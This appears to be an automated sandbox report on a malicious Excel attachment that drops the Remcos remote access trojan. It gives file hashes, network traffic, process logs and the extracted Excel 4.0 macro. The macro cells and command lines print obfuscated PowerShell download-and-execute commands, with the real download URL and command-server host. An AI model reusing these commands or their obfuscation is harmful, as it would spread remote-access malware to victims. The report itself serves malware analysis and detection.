                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JSZC9B2E50C9M18633UK.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.586853503054533
Encrypted: false
SSDEEP: 96:chQCsMqmqvsqvJCwokz8hQCsMqmqvsEHyqvJCworqzUkDYjHPf8/kilUVuIu:cy7okz8yvHnorqzZ+f88AIu
MD5: 5A1B6FFDCFCDB3DE498E0E1EA2A0D0AB
SHA1: 81E308A28AAEED43667C8C82AEBB48021AD6E055
SHA-256: D626EF1B89099C19723EB8C48402C3E45D92B0AA0698ADF8393360A72D4E4FB0
SHA-512: 0EE10776126CDA5DB0313E075B673F67E426BE0190CB34A917817F7221930A46E06999546C155780A084584461718BDE96841B567FA99EE40C08E7AA2210C6B1
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X7WLGBRLWC33P8TMDREG.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.586853503054533
Encrypted: false
SSDEEP: 96:chQCsMqmqvsqvJCwokz8hQCsMqmqvsEHyqvJCworqzUkDYjHPf8/kilUVuIu:cy7okz8yvHnorqzZ+f88AIu
MD5: 5A1B6FFDCFCDB3DE498E0E1EA2A0D0AB
SHA1: 81E308A28AAEED43667C8C82AEBB48021AD6E055
SHA-256: D626EF1B89099C19723EB8C48402C3E45D92B0AA0698ADF8393360A72D4E4FB0
SHA-512: 0EE10776126CDA5DB0313E075B673F67E426BE0190CB34A917817F7221930A46E06999546C155780A084584461718BDE96841B567FA99EE40C08E7AA2210C6B1
Malicious: false
C:\Users\user\AppData\Roaming\Remcos\logs.dat
Process: C:\Users\user\AppData\Roaming\Remcos\remcos.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 85
Entropy (8bit): 4.7501813069965415
Encrypted: false
SSDEEP: 3:ttUZFOJKrA4RXMRPHv33a1oy1aeo:tmK4XqdHv3qNIP
MD5: 6F990A2A0A10413C9997EA2F579DD420
SHA1: 85215BFD01BBA2E6EA1EA6762B46261A10F875A7
SHA-256: 1138DFBAF272481A8F9514D857975B2B3BF02524FDE0CCA3AD713ECE89B2F06E
SHA-512: 4632E444FEB775C9DD800C729FC1A55C608D8891B64C4DCC9B1D44BA355924049E56950AB82ED0115B448372C1BA0D7CBDF1636725622ACBC17E37BD8C6F8BA1
Malicious: false
Preview: ..[2021/01/06 07:46:48 Offline Keylogger Started]....[ Run ]....[ Program Manager ]..
C:\Users\user\AppData\Roaming\Remcos\remcos.exe
Process: C:\Users\user\AppData\Local\Temp\sm.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 691200
Entropy (8bit): 7.036651361847925
Encrypted: false
SSDEEP: 12288:EJZatLTZCZdmblvGcBElNOoSvhkvFqNmeeK:EJZATZsmbxGEaooIqF9ee
MD5: 35D3F86C5715649C8A4273E6A52B0B54
SHA1: CEBDA0A60751E95D44BF19522C0F315595C47F51
SHA-256: AEB1AAB3BE5B90CB85BFE28F0E092C83FEE4A742A9CDA7B0D8A6E464E6FA7342
SHA-512: B3CEC30F5F79DE0A31943160687C92D5304F837A8C1DE852B5F08682DB1C8DE1A4F44C13A92C6A37CC34BD842C2D7EBF219501CE52BCA0C6A785A93D7DD5A9F4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exe
Process: C:\Users\user\AppData\Local\Temp\sm.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 691200
Entropy (8bit): 7.036651361847925
Encrypted: false
SSDEEP: 12288:EJZatLTZCZdmblvGcBElNOoSvhkvFqNmeeK:EJZATZsmbxGEaooIqF9ee
MD5: 35D3F86C5715649C8A4273E6A52B0B54
SHA1: CEBDA0A60751E95D44BF19522C0F315595C47F51
SHA-256: AEB1AAB3BE5B90CB85BFE28F0E092C83FEE4A742A9CDA7B0D8A6E464E6FA7342
SHA-512: B3CEC30F5F79DE0A31943160687C92D5304F837A8C1DE852B5F08682DB1C8DE1A4F44C13A92C6A37CC34BD842C2D7EBF219501CE52BCA0C6A785A93D7DD5A9F4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
C:\Users\user\Desktop\0DFE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Applesoft BASIC program data, first line number 16
Category: dropped
Size (bytes): 410341
Entropy (8bit): 7.846523872773611
Encrypted: false
SSDEEP: 12288:2pOM3Kf8loRzQOctTs39yeNv1i8M9PeaX:2gMeFRzQwJNv69PeaX
MD5: CF69ABF05C024CE43BAC4550B0B22C48
SHA1: 585DFE665025C8FA05952E7486FD7A87DFB926CB
SHA-256: FA8FB3A504D56D78093F397181A3AA521A054B6A23A7AAC984B8C4272B5F0EA2
SHA-512: 7B9ABD6B418790EDE6BFEAD361F76DA432882532E399C44F73CF548BB53B0E4D37BF1E5032F9BFC6A54B37DC56C35887F8E1703415DD30DDA5BAC8DA5D658D24
Malicious: false
C:\Users\user\Documents\sm.exe
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: modified
Size (bytes): 691200
Entropy (8bit): 7.036651361847925
Encrypted: false
SSDEEP: 12288:EJZatLTZCZdmblvGcBElNOoSvhkvFqNmeeK:EJZATZsmbxGEaooIqF9ee
MD5: 35D3F86C5715649C8A4273E6A52B0B54
SHA1: CEBDA0A60751E95D44BF19522C0F315595C47F51
SHA-256: AEB1AAB3BE5B90CB85BFE28F0E092C83FEE4A742A9CDA7B0D8A6E464E6FA7342
SHA-512: B3CEC30F5F79DE0A31943160687C92D5304F837A8C1DE852B5F08682DB1C8DE1A4F44C13A92C6A37CC34BD842C2D7EBF219501CE52BCA0C6A785A93D7DD5A9F4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Last Saved By: Dell, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Wed Jan 6 00:01:29 2021, Security: 0
Entropy (8bit): 7.821971165060265
TrID:
• Microsoft Excel sheet (30009/1) 47.99%
• Microsoft Excel sheet (alternate) (24509/1) 39.20%
• Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name: Shipping Document PLBL003534.xls
File size: 401920
MD5: c32cd36c4ac0d06d321422080da164c8
SHA1: ded311853adf3cfc018be4f310bbfba6fcbd0357
SHA256: 74cdd5e924e15e451b3201884c8e647061d5d1e3a7e6cb88fccbb7f26878f1e2
SHA512: 693107c19ce26917cf58e967cc9493a2d6acadc4e1ebd525842ddc1514089ad40b149e7c606b5ea3ac276282c5e76f100d29035b27317dd765bfce5c5b3a5643
SSDEEP: 12288:m5OMHq/8No5zoOcVLEP9ietHli0M9fGaa:mwM215zowhtHy9fGaa

File Icon

Icon Hash: e4eea286a4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Shipping Document PLBL003534.xls"

Indicators

Has Summary Info: True
Application Name: unknown
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1252
Last Saved By: Dell
Create Time: 2020-09-20 21:17:44
Last Saved Time: 2021-01-06 00:01:29
Security: 0

Document Summary

Document Code Page: 1252
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 983040

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.232115956307
Base64 Encoded: False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.19331934541
Base64 Encoded: False
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 388805
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 388805
Entropy: 7.91814259565
Base64 Encoded: True

Macro 4.0 Code

The non-empty cells of the extracted macro sheet, with the CSV cell quoting removed (empty cells omitted):

=ERROR(FALSE)
=GET.CELL(5,M583)
=EXEC("c"&CHAR(109)&"d /c "&CHAR(D117)&"o^wer^she^l^l -w 1 (nEw-oB`jecT Ne"&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&"bcLIENt).('Do"&CHAR(119)&"n'+'loadFile').In"&CHAR(118)&"oke('"&CHAR(104)&"ttps://cutt.ly/mjfU5y0','sm"&CHAR(46)&"exe')")
=EXEC("c"&CHAR(109)&"d /c "&CHAR(D117)&"o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item ""sm"&CHAR(46)&"exe"" -Destination ""${enV`:temp}""")
=EXEC("c"&CHAR(109)&"d /c "&CHAR(D117)&"o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm"&CHAR(46)&"exe')")

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      Timestamp                | Protocol | SID     | Message                                                             | Source Port | Dest Port | Source IP    | Dest IP
                                                                      01/06/21-07:46:27.805527 | TCP      | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49169       | 80        | 192.168.2.22 | 83.172.144.37

                                                                      Network Port Distribution

                                                                      TCP Packets


                                                                      UDP Packets


                                                                      DNS Queries

                                                                      Timestamp                          | Source IP    | Dest IP | Trans ID | OP Code            | Name                   | Type           | Class
                                                                      Jan 6, 2021 07:46:25.926832914 CET | 192.168.2.22 | 8.8.8.8 | 0x70c0   | Standard query (0) | cutt.ly                | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:46:27.672903061 CET | 192.168.2.22 | 8.8.8.8 | 0xb15b   | Standard query (0) | bighoreca.nl           | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:21.152748108 CET | 192.168.2.22 | 8.8.8.8 | 0x78a4   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.514297009 CET | 192.168.2.22 | 8.8.8.8 | 0x3bb6   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.562608957 CET | 192.168.2.22 | 8.8.8.8 | 0x3bb6   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:25.898034096 CET | 192.168.2.22 | 8.8.8.8 | 0xe827   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:25.946357012 CET | 192.168.2.22 | 8.8.8.8 | 0xe827   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:28.285978079 CET | 192.168.2.22 | 8.8.8.8 | 0x61d6   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.237560987 CET | 192.168.2.22 | 8.8.8.8 | 0xdfea   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.298106909 CET | 192.168.2.22 | 8.8.8.8 | 0xdfea   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.656312943 CET | 192.168.2.22 | 8.8.8.8 | 0x408b   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.704891920 CET | 192.168.2.22 | 8.8.8.8 | 0x408b   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.047714949 CET | 192.168.2.22 | 8.8.8.8 | 0xf3ba   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.096323967 CET | 192.168.2.22 | 8.8.8.8 | 0xf3ba   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.440308094 CET | 192.168.2.22 | 8.8.8.8 | 0x5011   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.497515917 CET | 192.168.2.22 | 8.8.8.8 | 0x5011   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.838313103 CET | 192.168.2.22 | 8.8.8.8 | 0xb0ad   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.898076057 CET | 192.168.2.22 | 8.8.8.8 | 0xb0ad   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:43.204868078 CET | 192.168.2.22 | 8.8.8.8 | 0x444f   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.533502102 CET | 192.168.2.22 | 8.8.8.8 | 0xa191   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.590146065 CET | 192.168.2.22 | 8.8.8.8 | 0xa191   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:47.889868021 CET | 192.168.2.22 | 8.8.8.8 | 0x8223   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:50.224656105 CET | 192.168.2.22 | 8.8.8.8 | 0x1865   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:52.595844030 CET | 192.168.2.22 | 8.8.8.8 | 0x3426   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:54.948757887 CET | 192.168.2.22 | 8.8.8.8 | 0x81ab   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:54.997236013 CET | 192.168.2.22 | 8.8.8.8 | 0x81ab   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:57.321141005 CET | 192.168.2.22 | 8.8.8.8 | 0x3806   | Standard query (0) | blessings2021.ddns.net | A (IP address) | IN (0x0001)

                                                                      DNS Answers

                                                                      Timestamp                          | Source IP | Dest IP      | Trans ID | Reply Code   | Name                   | CName | Address       | Type           | Class
                                                                      Jan 6, 2021 07:46:25.983120918 CET | 8.8.8.8   | 192.168.2.22 | 0x70c0   | No error (0) | cutt.ly                |       | 104.22.1.232  | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:46:25.983120918 CET | 8.8.8.8   | 192.168.2.22 | 0x70c0   | No error (0) | cutt.ly                |       | 104.22.0.232  | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:46:25.983120918 CET | 8.8.8.8   | 192.168.2.22 | 0x70c0   | No error (0) | cutt.ly                |       | 172.67.8.238  | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:46:27.752340078 CET | 8.8.8.8   | 192.168.2.22 | 0xb15b   | No error (0) | bighoreca.nl           |       | 83.172.144.37 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:21.208853006 CET | 8.8.8.8   | 192.168.2.22 | 0x78a4   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.562139034 CET | 8.8.8.8   | 192.168.2.22 | 0x3bb6   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.618985891 CET | 8.8.8.8   | 192.168.2.22 | 0x3bb6   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:25.945950985 CET | 8.8.8.8   | 192.168.2.22 | 0xe827   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:26.002310038 CET | 8.8.8.8   | 192.168.2.22 | 0xe827   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:28.342349052 CET | 8.8.8.8   | 192.168.2.22 | 0x61d6   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.296565056 CET | 8.8.8.8   | 192.168.2.22 | 0xdfea   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.357040882 CET | 8.8.8.8   | 192.168.2.22 | 0xdfea   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.704406023 CET | 8.8.8.8   | 192.168.2.22 | 0x408b   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.761020899 CET | 8.8.8.8   | 192.168.2.22 | 0x408b   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.095710039 CET | 8.8.8.8   | 192.168.2.22 | 0xf3ba   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.144037008 CET | 8.8.8.8   | 192.168.2.22 | 0xf3ba   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.496793985 CET | 8.8.8.8   | 192.168.2.22 | 0x5011   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.555737972 CET | 8.8.8.8   | 192.168.2.22 | 0x5011   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.897711992 CET | 8.8.8.8   | 192.168.2.22 | 0xb0ad   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.948894024 CET | 8.8.8.8   | 192.168.2.22 | 0xb0ad   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:43.252649069 CET | 8.8.8.8   | 192.168.2.22 | 0x444f   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.589710951 CET | 8.8.8.8   | 192.168.2.22 | 0xa191   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.638139963 CET | 8.8.8.8   | 192.168.2.22 | 0xa191   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:47.946109056 CET | 8.8.8.8   | 192.168.2.22 | 0x8223   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:50.280874968 CET | 8.8.8.8   | 192.168.2.22 | 0x1865   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:52.646631002 CET | 8.8.8.8   | 192.168.2.22 | 0x3426   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:54.996865034 CET | 8.8.8.8   | 192.168.2.22 | 0x81ab   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:55.045100927 CET | 8.8.8.8   | 192.168.2.22 | 0x81ab   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)
                                                                      Jan 6, 2021 07:47:57.377233982 CET | 8.8.8.8   | 192.168.2.22 | 0x3806   | No error (0) | blessings2021.ddns.net |       | 185.244.30.19 | A (IP address) | IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • bighoreca.nl

                                                                      HTTP Packets

                                                                      Session ID: 0
                                                                      Source IP: 192.168.2.22
                                                                      Source Port: 49169
                                                                      Destination IP: 83.172.144.37
                                                                      Destination Port: 80
                                                                      Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                                                      Timestamp: Jan 6, 2021 07:46:27.805526972 CET
                                                                      kBytes transferred: 72
                                                                      Direction: OUT
                                                                      Data:
                                                                      GET /wp-content/themes/index/Shipppy.exe HTTP/1.1
                                                                      Host: bighoreca.nl
                                                                      Connection: Keep-Alive

                                                                      Timestamp: Jan 6, 2021 07:46:27.857237101 CET
                                                                      kBytes transferred: 72
                                                                      Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 06 Jan 2021 06:46:27 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 691200
                                                                      Last-Modified: Wed, 06 Jan 2021 00:01:43 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "5ff4fde7-a8c00"
                                                                      X-Powered-By: PleskLin
                                                                      Accept-Ranges: bytes


                                                                      HTTPS Packets

                                                                      Timestamp: Jan 6, 2021 07:46:26.097018003 CET
                                                                      Source IP: 104.22.1.232
                                                                      Source Port: 443
                                                                      Dest IP: 192.168.2.22
                                                                      Dest Port: 49167
                                                                      JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                                                      JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d

                                                                      Certificate chain presented by the server:

                                                                      Leaf certificate
                                                                      Subject: CN=www.cutt.ly
                                                                      Issuer: CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                      Not Before: Sat Feb 08 01:00:00 CET 2020
                                                                      Not After: Thu Apr 08 14:00:00 CEST 2021

                                                                      Intermediate certificate
                                                                      Subject: CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                      Issuer: CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                      Not Before: Thu Nov 02 13:24:33 CET 2017
                                                                      Not After: Tue Nov 02 13:24:33 CET 2027

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      System Behavior

                                                                      General

                                                                      Start time:07:45:47
                                                                      Start date:06/01/2021
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                      Imagebase:0x13f800000
                                                                      File size:27641504 bytes
                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:45:50
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                                                                      Imagebase:0x4acd0000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:07:45:50
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                                                                      Imagebase:0x4acd0000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:07:45:50
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                                                                      Imagebase:0x4acd0000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:07:45:51
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                                                                      Imagebase:0x13f340000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:45:51
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                                                                      Imagebase:0x13f340000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:45:51
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                                                                      Imagebase:0x13f340000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:46:18
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, Author: Joe Security
